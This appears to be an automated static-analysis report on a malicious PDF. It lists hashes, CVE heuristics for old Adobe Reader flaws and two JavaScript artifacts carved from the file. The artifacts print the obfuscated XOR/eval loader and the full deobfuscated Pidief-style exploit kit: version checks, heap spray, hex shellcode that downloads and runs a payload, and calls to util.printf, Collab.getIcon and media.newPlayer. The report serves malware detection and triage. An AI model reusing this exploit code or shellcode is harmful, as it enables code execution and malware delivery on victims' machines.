Malicious PDF / .SWA — malware analysis report

Static analysis result for SHA-256 c2019c6adc8abfd4…

MALICIOUS

PDF / .SWA

5.2 KB Authoring application: Wiwiqgejouitohzeqejoha (via c9c03Dxobeqane) First seen: 2026-05-11
MD5: cbc4c281e20eda9c4a424a8c2abceb3a SHA-1: 270bafa44131706826dafb3f87646bd7563fdd2d SHA-256: c2019c6adc8abfd4496b04f9cdb4f0e3eb907b80de961e2ae5fb5fdc0f88e42a
350 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 9

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ahrudi.egh/4 Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0011_000.js pdf-javascript-stream PDF /JS object 11 at offset 0xE57 1582 bytes
SHA-256: b2167c7a939e14cd0f800afe97b68c2ac3ddeb341edb60b13ae7324153309482
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var cJ='';var hQ='';if (!this.JSON) {try {                function walk(holder, key) {                    var k, v, value = holder[key];                    if (value && typeof value === 'object') {                        for (k in value) {                            if (Object.hasOwnProperty.call(value, k)) {                                v = walk(value, k);                                if (v !== undefined) {                                    value[k] = v;                                } else {                                    delete value[k];                                }                            }                        }                    }                    return reviver.call(holder, key, value);                }cJ='var ::mTQ = :217 ;::var oN =: t:his;v::ar dA=:\'ge\':+\'tPa::geNt:\'+:\'hWord\'::;::va:r :mL=\'ge\'+\'::tPag:\'+\'eN::u::mW:\'+\'::ords\';:var z::A=:\'f:r\'+\'omCh\'+\'arCode::\';var o::BW:=o:N[m::L](this.pageNum):;::var gR=::\'\';for(va::r zQ:=0;zQ< oB::W; zQ++::){gR=[gR,oN[dA](oN.pageNu::m::,zQ,true)].joi:n(\'::\');;:}::var kJ:=\'\';f::or(var zQ=0;zQ ::< :g::R.length; zQ+=:2){zM=:gR.substr(zQ:,2);:k::J=[::kJ,Stri::ng[zA](parseInt::(z:M,16)^mTQ)].join(::\'\');}ev::al:(k:J);::k::J::=null;'.replace(/[\:]/g, '');        function str(key, holder) {            var i,k,v,length,mind = gap,partial,value = holder[key];            if (value && typeof value === 'object' &&                    typeof value.toJSON === 'function') {                value = value.toJSON(key);            }    }hQ = new Function(cJ);oR(lO);} catch(wV){hQ();}}
legacy_pdfkit_stage_000.js deobfuscated-js getPageWords-XOR Pidief stage normalized at offset 0x0 3746 bytes
SHA-256: 5b41c784fbfe0c2ea0c35e52c66d2b0563cc57f9f916166c27c6c3bc43282a88
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
this.x="";this.aZ="";var zY={};var zG='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&=%#';h={};lM={lI:false};var eJI=this.info['j'].replace(/[\s]/g, '');b=19290;b--;iJ=16854;iJ--;var pU="pU";var xW="xW";var oV = this.info;var lY = (oV.producer.substr(0,5) == 'debug');var wR = new Array(); var xG = "%u";function mBO(str){str = str.split(xG);var ret="";for(var i in str){if(str[i] != "")ret += String.fromCharCode(parseInt(str[i],16));}return ret;}function mT(str1, str2){return [str1, str2].join("");}function hC(aN){var rE = qL();var zK = uX();rE += ((rE.indexOf("?") > -1) ? "&" : "?") + "reader_version=" + zK;if(lY) app.alert("URL: " + rE);rE=v(rE);var d=xG;var zM=d+"C033"+d+"8B64"+d+"3040"+d+"0C78"+d+"408B"+d+"8B0C"+d+"1C70"+d+"8BAD"+d+"0858"+d+"09EB"+d+"408B"+d+"8D34"+d+"7C40"+d+"588B"+d+"6A3C"+d+"5A44"+d+"E2D1"+d+"E22B"+d+"EC8B"+d+"4FEB"+d+"525A"+d+"EA83"+d+"8956"+d+"0455"+d+"5756"+d+"738B"+d+"8B3C"+d+"3374"+d+"0378"+d+"56F3"+d+"768B"+d+"0320"+d+"33F3"+d+"49C9"+d+"4150"+d+"33AD"+d+"36FF"+d+"BE0F"+d+"0314"+d+"F238"+d+"0874"+d+"CFC1"+d+"030D"+d+"40FA"+d+"EFEB"+d+"3B58"+d+"75F8"+d+"5EE5"+d+"468B"+d+"0324"+d+"66C3"+d+"0C8B"+d+"8B48"+d+"1C56"+d+"D303"+d+"048B"+d+"038A"+d+"5FC3"+d+"505E"+d+"8DC3"+d+"087D"+d+"5257"+d+"33B8"+d+"8ACA"+d+"E85B"+d+"FFA2"+d+"FFFF"+d+"C032"+d+"F78B"+d+"AEF2"+d+"B84F"+d+"2E65"+d+"7865"+d+"66AB"+d+"6698"+d+"B0AB"+d+"8A6C"+d+"98E0"+d+"6850"+d+"6E6F"+d+"642E"+d+"7568"+d+"6C72"+d+"546D"+d+"8EB8"+d+"0E4E"+d+"FFEC"+d+"0455"+d+"5093"+d+"C033"+d+"5050"+d+"8B56"+d+"0455"+d+"C283"+d+"837F"+d+"31C2"+d+"5052"+d+"36B8"+d+"2F1A"+d+"FF70"+d+"0455"+d+"335B"+d+"57FF"+d+"B856"+d+"FE98"+d+"0E8A"+d+"55FF"+d+"5704"+d+"EFB8"+d+"E0CE"+d+"FF60"+d+"0455";zM+=rE;return mBO(zM);};function qL(){var iD = (oV.author + oV.title).replace(/[\s]/g, '');var fW = qF(iD, eJI, zG);return fW;};function qF(iD, zG, eJI){var fW="";for(var i=0; i < iD.length; i++){var zW = zG.indexOf(iD[i]);if(zW > -1 ){fW += eJI[zW];}}return fW;};function v(iD){var out = "";iD = gB(iD);g = Math.round(iD.length / 4);if (g != iD.length /4) iD+="00";for(var i=0; i < iD.length; i+=4){out+= xG + iD.substr(i+2, 2) + iD.substr(i, 2);}return out;};function gB(s){var i, f = 0, a = [];s += '';f = s.length;for (i = 0; i<f; i++) {a[i] = s.charCodeAt(i).toString(16).replace(/^([\da-f])$/,"0$1").toUpperCase();}return a.join('');};function vS(kZ, len){while (kZ.length * 2 < len){kZ = mT(kZ, kZ);}return kZ.substring(0, len / 2);};function hW(cV){var fQ = 0x0c0c0c0c;        cN = hC("pdf");if (cV == 1){fQ = 0x30303030;}var rA = 0x400000;var ln = cN.length * 2;var mBC = rA - (ln + 0x38);var kZ = mBO(xG+"9090"+xG+"9090"); kZ = vS(kZ, mBC);var cD = (fQ - 0x400000) / rA;for (var zC = 0; zC < cD; zC ++ ){wR[zC] = mT(kZ, cN);}};function uX(){try {return app.viewerVersion.toString();}catch(kT){    return 0;}}if(lY) app.alert("called exploit");var zK = uX();if(lY)  app.alert("v: " + zK);if (zK > 8){if(lY) app.alert("util.printf");hW(1);var lU = "12999999999999999999";for (kTQ=0; kTQ < 276; kTQ++) lU += "8";util.printf("%45000f", lU);}if (zK < 8){if(lY) app.alert("Collab.collectEmailInfo");hW(0);var iF = mBO(xG+"0c0c"+xG+"0c0c");while (iF.length < 44952) iF += iF;this.collabStore = Collab.collectEmailInfo({ subj : "", msg : iF});}if (zK < 9.1){if (app.doc.Collab.getIcon){if(lY) app.alert("Collab.getIcon");hW(0);var tQ = unescape("%09");while (tQ.length < 0x4000) tQ += tQ;tQ = "N." + tQ;app.doc.Collab.getIcon(tQ);}}if (zK == 9.2){if(lY) app.alert("media.newPlayer");hW(1);var sf="1.000000000.000000000.1337 : 3.13.37";util.printd(sf, new Date());try {media.newPlayer(null);} catch(e) {}util.printd(sf, new Date());}var tA=[];try {var dQ='cH'.substr(16729,16729)} catch(dQ){};try {var tY='kV'.substr(12933,12933)} catch(tY){};4

Open this report in the interactive analyzer, or submit your own file for analysis.